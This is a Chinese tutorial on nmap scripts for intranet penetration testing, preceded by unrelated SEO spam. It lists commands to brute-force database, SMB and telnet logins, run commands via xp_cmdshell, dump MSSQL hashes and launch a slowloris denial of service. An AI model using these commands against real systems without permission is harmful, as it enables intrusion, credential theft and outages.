上海好的高端网站建设服务公司,济南企业自助建站,现在ps做网站的尺寸,网站制作网页版原文链接#xff1a;http://drops.wooyun.org/tips/2188 0x00 前言#xff1a; nmap的基本介绍和基本使用方法#xff0c;在乌云知识库中已经有人提交过#xff0c;讲的比较详细#xff0c;在此文中就不再讲述。 具体链接#xff1a;http://drops.wooyun.org/tips/2002 本…原文链接http://drops.wooyun.org/tips/2188 0x00 前言 nmap的基本介绍和基本使用方法在乌云知识库中已经有人提交过讲的比较详细在此文中就不再讲述。 具体链接http://drops.wooyun.org/tips/2002 本文主要讲解nmap的众多脚本的使用在内网渗透的时候尤其好用。 0x01 nmap按脚本分类扫描 nmap脚本主要分为以下几类在扫描时可根据需要设置--script类别这种方式进行比较笼统的扫描 auth: 负责处理鉴权证书绕开鉴权的脚本
broadcast: 在局域网内探查更多服务开启状况如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本提供基本脚本扫描能力
discovery: 对网络进行更多的信息如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源例如进行whois解析
fuzzer: 模糊测试的脚本发送异常的包到目标机探测出潜在漏洞 intrusive: 入侵性的脚本此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反属于安全性脚本
version: 负责增强服务与版本扫描Version Detection功能的脚本
vuln: 负责检查目标机是否有常见的漏洞Vulnerability如是否有MS08_067部分使用截图 1 nmap --scriptauth 192.168.137.* 负责处理鉴权证书绕开鉴权的脚本,也可以作为检测部分应用弱口令 2nmap --scriptbrute 192.168.137.* 提供暴力破解的方式 可对数据库smbsnmp等进行简单密码的暴力猜解 3nmap --scriptdefault 192.168.137.* 或者 nmap -sC 192.168.137.* 默认的脚本扫描主要是搜集各种应用服务的信息收集到后可再针对具体服务进行攻击 4nmap --scriptvuln 192.168.137.* 检查是否存在常见漏洞 5nmap -n -p445 --scriptbroadcast 192.168.137.4 在局域网内探查更多服务开启状况 6nmap --script external 202.103.243.110 利用第三方的数据库或资源例如进行whois解析 0x02 nmap按应用服务扫描 1vnc扫描 检查vnc bypass 1 nmap --scriptrealvnc-auth-bypass 192.168.137.4 检查vnc认证方式 nmap --scriptvnc-auth 192.168.137.4 获取vnc信息 nmap --scriptvnc-info 192.168.137.4 2smb扫描 smb破解 nmap --scriptsmb-brute.nse 192.168.137.4 smb字典破解 nmap --scriptsmb-brute.nse --script-argsuserdb/var/passwd,passdb/var/passwd 192.168.137.4 smb已知几个严重漏 nmap --scriptsmb-check-vulns.nse --script-argsunsafe1 192.168.137.4 查看共享目录 nmap -p 445 --script smb-ls --script-args ‘sharee$,path\,smbusertest,smbpasstest’ 192.168.137.4 查询主机一些敏感信息注需要下载nmap_service nmap -p 445 -n –scriptsmb-psexec --script-args smbusertest,smbpasstest 192.168.137.4 查看会话 nmap -n -p445 --scriptsmb-enum-sessions.nse --script-argssmbusertest,smbpasstest 192.168.137.4 系统信息 nmap -n -p445 --scriptsmb-os-discovery.nse --script-argssmbusertest,smbpasstest 192.168.137.4 3Mssql扫描 猜解mssql用户名和密码 nmap -p1433 --scriptms-sql-brute --script-argsuserdb/var/passwd,passdb/var/passwd 192.168.137.4 xp_cmdshell 执行命令 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.usernamesa,mssql.passwordsa,ms-sql-xp-cmdshell.cmdnet user 192.168.137.4 dumphash值 nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.usernamesa,mssql.passwordsa 192.168.137.4 4Mysql扫描 扫描root空口令 nmap -p3306 --scriptmysql-empty-password.nse 192.168.137.4 列出所有mysql用户 nmap -p3306 --scriptmysql-users.nse --script-argsmysqluserroot 192.168.137.4 支持同一应用的所有脚本扫描 nmap --scriptmysql-* 192.168.137.4 5Oracle扫描 oracle sid扫描 nmap --scriptoracle-sid-brute -p 1521-1560 192.168.137.5 oracle弱口令破解 nmap --script oracle-brute -p 1521 --script-args oracle-brute.sidORCL,userdb/var/passwd,passdb/var/passwd 192.168.137.5 6其他一些比较好用的脚本nmap --scriptbroadcast-netbios-master-browser 192.168.137.4 发现网关
nmap -p 873 --script rsync-brute --script-args rsync-brute.modulewww 192.168.137.4 破解rsync
nmap --script informix-brute -p 9088 192.168.137.4 informix数据库破解
nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解
nmap -sU --script snmp-brute 192.168.137.4 snmp破解
nmap -sV --scripttelnet-brute 192.168.137.4 telnet破解
nmap --scripthttp-vuln-cve2010-0738 --script-args http-vuln-cve2010-0738.paths{/path1/,/path2/} target jboss autopwn
nmap --scripthttp-methods.nse 192.168.137.4 检查http方法
nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻击对于处理能力较小的站点还挺好用的 half-HTTP connections nmap --scriptsamba-vuln-cve-2012-1182 -p 139 192.168.137.47不靠谱的脚本 vnc-brute 次数多了会禁止连接 pcanywhere-brute 同上 0x03 学会脚本分析 nmap中脚本并不难看懂所以在使用时如果不知道原理可以直接看利用脚本即可也可以修改其中的某些参数方便自己使用。 举例 关于oracle的弱口令破解 调用过程oracle-brute.nse oracle-default-accounts.lst 首先是调用破解脚本 根据脚本中字典的位置去查看默认字典当然也可以将破解的字符自行添加其中或者是修改脚本或参数改变破解字典 。转载于:https://www.cnblogs.com/outline/p/nmap.html